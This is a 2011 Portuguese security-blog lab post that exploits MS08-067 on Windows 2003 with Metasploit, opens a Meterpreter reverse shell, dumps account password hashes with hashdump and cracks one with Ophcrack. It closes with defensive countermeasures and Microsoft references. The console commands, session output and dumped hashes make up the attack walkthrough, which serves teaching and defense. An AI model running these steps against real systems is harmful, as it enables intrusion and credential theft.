Ir para o conteúdo
ou

Software livre Brasil

 Voltar a Alexos Core ...
Tela cheia

Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack

29 de Março de 2011, 0:00 , por Software Livre Brasil - 0sem comentários ainda | Ninguém está seguindo este artigo ainda.
Visualizado 603 vezes
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo.png"><img class="alignleft size-medium wp-image-2337" title="metasploit-logo" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo-300x197.png" height="197" alt="" width="300" /></a>Quando o assunto é <a href="http://blog.alexos.com.br/en.wikipedia.org/wiki/Payload_(software)">payload</a> o <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_About_Meterpreter"> Meterpreter </a> é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.</p> <p>Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.</p> <p>Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O <a href="http://ophcrack.sourceforge.net/">Ophcrack</a> é um password cracker multiplataforma livre baseado em <a href="http://en.wikipedia.org/wiki/Rainbow_table">rainbow tables</a> para quebra de senha de sistemas Windows.</p> <p>Existem <a href="http://ophcrack.sourceforge.net/tables.php">tables gratuitas</a> no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.</p> <p><strong><br /> Vamos aos testes<br /> </strong></p> <p>Iniciando um conexão com o Meterpreter e obtendo o dump de senhas</p> <blockquote><p> msf exploit(ms08_067_netapi) > exploit</p> <p>[*] Started reverse handler on 11.11.11.11:4444<br /> [*] Automatically detecting the target&#8230;<br /> [*] Fingerprint: Windows 2003 &#8211; No Service Pack &#8211; lang:Unknown<br /> [*] Selected Target: Windows 2003 SP0 Universal<br /> [*] Attempting to trigger the vulnerability&#8230;<br /> [*] Sending stage (749056 bytes) to 11.11.11.11<br /> [*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011 </p></blockquote> <blockquote><p> meterpreter > hashdump</p> <p><strong>Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::</strong><br /> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br /> SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589::: </p></blockquote> <p>Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!</p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1.png"><img class="alignnone size-medium wp-image-2363" title="ophcrack1" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21.png"><img class="alignnone size-medium wp-image-2368" title="ophcrack2" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3.png"><img class="alignnone size-medium wp-image-2369" title="ophcrack3" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4.png"><img class="alignnone size-medium wp-image-2371" title="ophcrack4" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4-300x187.png" height="187" alt="" width="300" /></a></p> <p>Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.<br /> <strong><br /> Contramedidas<br /> </strong></p> <p>Use as seguintes medidas preventivas contra este tipo de ataque:</p> <blockquote><p> <strong>1 &#8211; Use senhas complexas;</p> <p>2 &#8211; Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );</p> <p>3 &#8211; Mantenha seu sistema atualizado;</p> <p>4 &#8211; Mantenha o firewall local ativado;</p> <p>5 &#8211; Use sistemas de proteção robustos e com checagem em tempo real da memória; </p> <p>6 &#8211; Se você não está afim de gastar ( item 5 ) então utilize o <a href="http://www.microsoft.com/security_essentials/">MSE</a> ( Microsoft Security Essentials ) juntamente com um <a href="http://www.firewallguide.com/software.htm">firewall pessoal</a>.</strong> </p></blockquote> <p><strong><br /> Mais informações:<br /> </strong></p> <p><a href="http://support.microsoft.com/kb/299656">How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases</a></p> <p><a href="http://technet.microsoft.com/en-us/library/cc512606.aspx">Frequently Asked Questions about Passwords and Password Attacks</a></p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2335&amp;lang=pt-br" class="crp_title">MSF Meterpreter: Quebrando senhas do VNC</a></li><li><a href="http://blog.alexos.com.br/?p=2180&amp;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2344&amp;lang=pt-br" class="crp_title">Meterpreter: VNC Crack Contramedidas</a></li><li><a href="http://blog.alexos.com.br/?p=2302&amp;lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=1119&amp;lang=pt-br" class="crp_title">Quebre senhas online ( Updated )</a></li></ul></div>
Fonte: http://blog.alexos.com.br/?p=2380&lang=pt-br

0sem comentários ainda

Enviar um comentário

Os campos são obrigatórios.

Se você é um usuário registrado, pode se identificar e ser reconhecido automaticamente.